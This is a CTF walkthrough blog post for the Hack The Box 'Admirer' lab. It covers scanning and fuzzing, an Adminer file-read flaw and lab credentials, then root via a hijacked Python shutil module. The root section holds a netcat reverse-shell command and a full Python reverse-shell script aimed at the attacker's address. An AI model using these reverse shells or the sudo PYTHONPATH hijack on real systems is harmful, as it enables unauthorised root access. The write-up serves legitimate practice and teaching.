ADMINER WRITEUP

NMAP SCANS

 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 21:19 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating Ping Scan at 21:19
    Scanning 10.10.10.187 [4 ports]
    Completed Ping Scan at 21:19, 0.35s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 21:19
    Completed Parallel DNS resolution of 1 host. at 21:19, 0.58s elapsed
    Initiating SYN Stealth Scan at 21:19
    Scanning 10.10.10.187 [1000 ports]
    Discovered open port 21/tcp on 10.10.10.187
    Discovered open port 22/tcp on 10.10.10.187
    Discovered open port 80/tcp on 10.10.10.187
    Increasing send delay for 10.10.10.187 from 0 to 5 due to 103 out of 257 dropped probes since last increase.
    Increasing send delay for 10.10.10.187 from 5 to 10 due to 140 out of 349 dropped probes since last increase.
    SYN Stealth Scan Timing: About 41.43% done; ETC: 21:20 (0:00:44 remaining)
    Completed SYN Stealth Scan at 21:22, 172.70s elapsed (1000 total ports)
    Initiating Service scan at 21:22
    Scanning 3 services on 10.10.10.187
    Completed Service scan at 21:22, 5.00s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.187
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    Retrying OS detection (try #2) against 10.10.10.187
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
    adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
    Initiating Traceroute at 21:23
    Completed Traceroute at 21:23, 2.03s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 21:23
    Completed Parallel DNS resolution of 2 hosts. at 21:23, 3.49s elapsed
    NSE: Script scanning 10.10.10.187.
    Initiating NSE at 21:23
    Completed NSE at 21:24, 50.50s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 5.01s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Nmap scan report for 10.10.10.187
    Host is up (2.0s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE    VERSION
    21/tcp open  tcpwrapped
    22/tcp open  tcpwrapped
    |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
    80/tcp open  tcpwrapped
    Aggressive OS guesses: Android 4.1.1 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Android 4.1.2 (94%), Android 4.2.2 (Linux 3.4) (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.13 (94%), Linux 4.10 (94%), Linux 4.4 (94%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 554/tcp)
    HOP RTT     ADDRESS
    1   3.83 ms 10.10.14.1
    2   3.82 ms 10.10.10.187

    NSE: Script Post-scanning.
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 288.03 seconds
            Raw packets sent: 4389 (197.784KB) | Rcvd: 3533 (159.868KB)


PORT 80

Lets move on to robots.txt.

here we have admin-dir available

which is Forbidden .After FUZZING I Got 2 directories:

Contacts


    ##########
    # admins #
    ##########
    # Penny
    Email: p.wise@admirer.htb


    ##############
    # developers #
    ##############
    # Rajesh
    Email: r.nayyar@admirer.htb

    # Amy
    Email: a.bialik@admirer.htb

    # Leonard
    Email: l.galecki@admirer.htb



    #############
    # designers #
    #############
    # Howard
    Email: h.helberg@admirer.htb

    # Bernadette
    Email: b.rauch@admirer.htb
    # Amy
    Email: a.bialik@admirer.htb

    # Leonard
    Email: l.galecki@admirer.htb



    #############
    # designers #
    #############
    # Howard
    Email: h.helberg@admirer.htb

    # Bernadette
    Email: b.rauch@admirer.htb

Credentials


    [Internal mail account]
    w.cooper@admirer.htb
    fgJr6q#S\W:$P

    [FTP account]
    ftpuser
    %n?4Wz}R$tTF7

    [Wordpress account]
    admin
    w0rdpr3ss01!

Here we got FTP user and pass!

FTP LOGINS AND ENUMERATION

    root@liquid:~/Desktop/HTB/admirerC# ftp 10.10.10.187
    Connected to 10.10.10.187.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.187:root): ftpuser
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0            3405 Dec 02 21:24 dump.sql
    -rw-r--r--    1 0        0         5270987 Dec 03 21:20 html.tar.gz
    226 Directory send OK.
    ftp> get *
    local: credentials.txt remote: *
    200 PORT command successful. Consider using PASV.
    550 Failed to open file.
    ftp> mget *
    mget dump.sql? 
    mget html.tar.gz? 

Here we have two files available.After checking both here what we got !!!

html file

    root@liquid:~/Desktop/HTB/admirerC/html# ls -la
    total 36
    drwxr-xr-x 6 root root     4096 May  5 17:52 .
    drwxr-xr-x 3 root root     4096 May 29 15:15 ..
    drwxr-x--- 6 root www-data 4096 Jun  7  2019 assets
    drwxr-x--- 4 root www-data 4096 Dec  3 01:59 images
    -rw-r----- 1 root www-data 4613 Dec  4 01:50 index.php
    -rw-r----- 1 root www-data  134 Dec  2 03:01 robots.txt
    drwxr-x--- 2 root www-data 4096 Dec  2 23:20 utility-scripts
    drwxr-x--- 2 root www-data 4096 Dec  2 22:55 w4ld0s_s3cr3t_d1r

utility-scripts directory is interesting

After going through that we got another web directory to check

utility-scripts

    root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# ls -l
    total 16
    -rw-r----- 1 root www-data 1795 Dec  2 23:18 admin_tasks.php
    -rw-r----- 1 root www-data  401 Dec  2 03:58 db_admin.php
    -rw-r----- 1 root www-data   20 Nov 30  2019 info.php
    -rw-r----- 1 root www-data   53 Dec  2 23:10 phptest.php

We have number of files here some of them have passwords and all.But Here we came to know one thing that we have database here!!

lets FUZZ directories after utility-scripts

    root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/utility-scripts/FUZZ.FUZ2Z -z list,php --hc 403,404  -c

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.

    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************

    Target: http://admirer.htb/utility-scripts/FUZZ.FUZ2Z
    Total requests: 20592

    ===================================================================
    ID           Response   Lines    Word     Chars     Payload                                      
    ===================================================================

    000001873:   200        51 L     235 W    4156 Ch     "adminer - php"  

Here we got adminer.php

Now we need exploit!!

After googlefu I got a website !!

https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Here we have exploit for adminer!!

For that we need to create user and its own database for that!!

Here Are the links for creating user and database

https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql

After creating database here we have login like this !!

    root@liquid:~/Desktop/HTB/admirerC# mysql -u new adminer -p
    Enter password: 
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 59
    Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [adminer]> 

Then login to adminer.php

Lets try to access /etc/passwd file!

but we will get error as Path error!


So lets try to access index.php which was just one directory back

Here We go!!

Again with some Passwords!!

SSH WALDO USER ACCESS

    root@liquid:~/Desktop/HTB/admirerC# ssh waldo@10.10.10.187
    waldo@10.10.10.187's password: 
    Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

    The programs included with the Devuan GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    You have mail.
    Last login: Sun May 31 17:18:37 2020 from 10.10.14.185
    waldo@admirer:~$ id
    uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)

GETTING ROOT ACCESS

Lets use basic command to check!!

   waldo@admirer:~$ sudo -l
    [sudo] password for waldo: 
    Matching Defaults entries for waldo on admirer:
        env_reset, env_file=/etc/sudoenv, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
        listpw=always

    User waldo may run the following commands on admirer:
        (ALL) SETENV: /opt/scripts/admin_tasks.sh
    waldo@admirer:~$ 

After running that script and using cat command I came to know that it is running every option available. here in that directory we have 2 Files !!

    waldo@admirer:/opt/scripts$ ls -l
    total 8
    -rwxr-xr-x 1 root admins 2613 Dec  2 20:36 admin_tasks.sh
    -rwxr----- 1 root admins  198 Dec  2 20:36 backup.py
    waldo@admirer:/opt/scripts$

Here we see that backup file is running function make_archive and also importing it from shutil which is python lib!! this backup file is backing web part as option 6!! what if we add our own lib path and our own lib name shutil and it will backup file using our library we just made as reverse shell which will be executed ny root as it is owned by root

    waldo@admirer:~/liquid$ cat shutil.py 
    import os

    def make_archive(a,s,d):
        os.system("nc 10.10.14.140 9003 -e /bin/sh")
    waldo@admirer:~/liquid$ 

Now lets add this path in python and run the script!!

but remember to open listener first!!

    waldo@admirer:~/liquid$ sudo PYTHONPATH=~/liquid /opt/scripts/admin_tasks.sh 

    [[[ System Administration Menu ]]]
    1) View system uptime
    2) View logged in users
    3) View crontab
    4) Backup passwd file
    5) Backup shadow file
    6) Backup web data
    7) Backup DB
    8) Quit
    Choose an option: 6
    Running backup script in the background, it might take a while...

<br>
Here we got root access!!


    root@liquid:~/Desktop/HTB/admirer# nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.140] from (UNKNOWN) [10.10.10.187] 46778
    root@admirer:/home/waldo/liquid# cd
    cd
    root@admirer:~# id 
    id 
    uid=0(root) gid=0(root) groups=0(root)

NOTE : here we can use another python code to get shell as i did above :

  waldo@admirer:~/liquid$ cat shutil1.py 
    import os
    import pty
    import socket

    lhost = "10.10.14.140"
    lport = 9002

    ZIP_DEFLATED = 0

    class ZipFile:
        def close(*args):
            return

        def write(*args):
            return

        def __init__(self, *args):
            return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

One thought on “ADMINER WRITEUP

Add yours

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: